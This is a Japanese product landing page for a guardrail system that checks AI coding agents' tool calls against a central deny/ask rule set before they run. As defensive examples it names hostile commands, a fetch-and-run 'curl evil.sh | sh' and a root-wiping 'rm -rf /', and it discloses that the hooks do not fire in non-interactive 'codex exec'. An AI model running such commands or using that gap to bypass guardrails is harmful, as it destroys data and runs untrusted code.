Claude Code / Codex を
全社導入するときの、
最初のガードレール。
AIコーディングエージェントの「危険な操作」を、AIの判断に委ねない。ツール実行の一歩手前で、決定的なルールが止める。エンジニア組織のためのガバナンス基盤です。
Claude Code・Codex CLI・Claude Desktop / Cowork に対応 — 読み取り専用プラグインとして各エンジニアへ配布。
モデルの性能ではなく、ガバナンスが本番導入を止めている。
止まる理由の多くは、モデルの精度ではありません。ガバナンスとコンプライアンスの土台が無いことです。
Claude Code や Codex は強力です。だからこそ、全エンジニアの手元で Bash を実行し、ファイルを書き換え、外部から取得したスクリプトを走らせます。「AIがうまく判断してくれる」という前提では、情報システム部門も法務も、全社展開にゴーサインを出せません。
必要なのは、AIの賢さに依存しない決定的なガードレール。実行される前に、組織のルールで止まる仕組みです。
「賢く止める」のではなく、「決定的に止める」。
すべてのエンジニアに、読み取り専用のローカルプラグインとして配布。ローカルマーケットプレイス(Claude Code / Codex CLI)またはZIPアップロード(Claude Desktop / Cowork)で導入します。
ツールが動く前に、呼び出しを検査する。
Bash / Edit / Write / MultiEdit / NotebookEdit / WebFetch / Read。これらの呼び出しは、実行される前にフックが決定的に検査します。中央の「危険な操作」ルールセット(単一の情報源)に照らして、拒否するか確認を求める。AIの気分や解釈に左右されません。
tool = "Bash"
input = "git push --force origin main"
→ match: dangerous-actions/git-force-push
decision = "ask" # 人間の確認を要求
reason = "履歴を破壊する可能性"
tool = "Bash"
input = "curl evil.sh | sh"
decision = "deny" # 実行させない
ルールは、一箇所で管理する。
何を止め、何に確認を求めるか。判断基準は中央の dangerous-actions ルールセットに集約されています。組織のポリシーが変われば、ここを更新するだけ。全エンジニアの環境に、同じ基準が一貫して効きます。
- id: rm-rf-root
match: "rm -rf /"
action: deny
- id: remote-exec
match: "curl|wget * | sh"
action: deny
- id: force-push
match: "git push --force"
action: ask
APIキーを、平文でローカルに置かない。
APIキーやトークンは、ローカルに平文で保存されません。GCP Secret Manager への参照として持ち、使用する瞬間にラッパースクリプトが取得します。手元の .env やシェル履歴から鍵が漏れるリスクを、構造的に断ちます。
入れる前に、依存パッケージを疑う。
新しいライブラリを導入する前に、専用の install-audit サブエージェントが起動。パッケージの利用実績(人気シグナル)とGitHubのソースを読み取り専用で調べ、バックドア・情報漏洩・既知のCVEといったサプライチェーンリスクを、実際にインストールする前に評価します。
「AIエージェント監視」プラットフォームとは、狙いが違う。
本番で動くAIエージェントを実行時に監視する市場は、すでに競合がひしめいています。私たちの狙いは、もっと手前で、もっと具体的です。
本番エージェントの実行時監視
- —デプロイ済みの自律エージェントを、運用フェーズで観測する
- —対象は本番システム全般。抽象度が高く、説明が難しい
- —大手が多数参入し、レイヤーとして混雑している
コーディングエージェント特化のガバナンス
- ✓エンジニアが使う Claude Code / Codex に、開発時点でガードレールをかける
- ✓「Bashを実行前に止める」——具体的で、情シスにも法務にも説明できる
- ✓狭く、確実に効く楔(くさび)。全社導入の最初の一歩に据えられる
机上の設計ではなく、国内大手企業の開発現場で動いている。
この基盤は、ある国内大手グループ企業の開発組織における実案件として構築され、現在も稼働しています。数百人規模のエンジニアへ読み取り専用プラグインとして配布し、日々のツール呼び出しを実行前に評価し続けています。ここに書いた4つの仕組みは、すべて実際に運用されているものです。
正直に言う、既知の制限。
ガードレールは万能ではありません。信頼していただくために、現時点の限界を明示します。
Codex CLI のフックは、対話セッションでのみ発火します。初回の信頼承認を経た対話モードでは PreToolUse フックが機能しますが、非対話実行 — codex exec — では PreToolUse フックはまったく動きません。CI やバッチのような自動実行の経路には、この層だけでは防御が及びません。該当する運用がある場合は、別のガード(実行環境の分離やネットワーク制限など)と組み合わせる設計が必要です。この点も含めて、導入時にご一緒に整理します。
全社導入の前に、
ガードレールを。
Claude Code / Codex の組織展開を検討している、エンジニアリング責任者・プラットフォームチームの方へ。現場で動いている実装をベースに、御社の環境に合わせてご相談します。
上記ボタンからフォームにご記入いただけます。担当より折り返しご連絡します。